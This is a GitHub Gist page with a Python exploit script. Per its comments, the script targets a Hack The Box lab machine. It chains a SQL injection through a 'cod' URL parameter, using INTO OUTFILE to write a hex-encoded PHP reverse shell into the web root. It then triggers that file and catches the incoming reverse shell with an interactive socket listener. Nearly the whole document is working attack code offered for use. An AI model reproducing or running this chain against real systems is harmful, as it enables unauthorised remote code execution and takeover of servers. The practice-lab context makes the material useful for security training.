Created
November 3, 2019 19:58
-
-
Save vitorfhc/13f26da389c2124812792d52b8002770 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# This code was written by Vitor Falcão <vitorfhc at protonmail.com> | |
#!/usr/bin/python3 | |
from socket import socket, AF_INET, SOCK_STREAM, SOL_SOCKET, SO_REUSEADDR | |
from threading import Thread | |
from requests import get, exceptions | |
from string import ascii_lowercase, ascii_uppercase | |
from random import choice | |
from binascii import hexlify | |
FILE = "reverse.min.php" # file with reverse php shell | |
HOST = "http://10.10.10.143" # htb machine ip | |
IP = "10.10.15.8" # reverse shell ip | |
PORT = 1337 # reverse shell port | |
def random_string(length): | |
letters = ascii_lowercase + ascii_uppercase | |
string = [choice(letters) for i in range(length)] | |
string = "".join(string) | |
return string | |
def file_to_hex(filename): | |
global IP | |
global PORT | |
port_str = str(PORT) | |
with open(filename) as f: | |
content = f.read() | |
content = content.replace("$ip='ip'", f"$ip='{IP}'") | |
content = content.replace("$port=1337", f"$port={port_str}") | |
ret = "0x" | |
ret += hexlify(content.encode()).decode() | |
return ret | |
def sqli(): | |
global FILE | |
print("Making sql injection") | |
url = HOST + "/room.php?cod=" | |
random_name = random_string(8) + ".php" | |
hex_payload = file_to_hex(FILE) | |
payload = f"1 or 1=2 limit 0,1 into outfile '/var/www/html/{random_name}' lines terminated by {hex_payload}" | |
get(url + payload) | |
print("Created file", random_name, "on the server") | |
return random_name | |
def execute_reverse(path): | |
print("Executing reverse shell:", path) | |
path = "/" + path | |
url = HOST + path | |
try: | |
get(url, timeout=3) | |
except exceptions.Timeout as e: | |
pass | |
def listen_conn(): | |
global PORT | |
with socket(AF_INET, SOCK_STREAM) as s: | |
s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) | |
s.bind(("0.0.0.0", PORT)) | |
s.listen() | |
conn, addr = s.accept() | |
with conn: | |
print("Got connection from", addr) | |
data = conn.recvmsg(4096) | |
while True: | |
data = conn.recvmsg(4096) | |
print(data) | |
send = input("Send: ") | |
conn.sendall(send.encode()) | |
def get_info(): | |
global IP | |
new_ip = input(f"Your IP [{IP}]: ") | |
if len(new_ip.strip()): | |
IP = new_ip | |
def main(): | |
get_info() | |
path = sqli() | |
l = Thread(target=listen_conn) | |
l.start() | |
execute_reverse(path) | |
l.join() | |
if __name__ == "__main__": | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment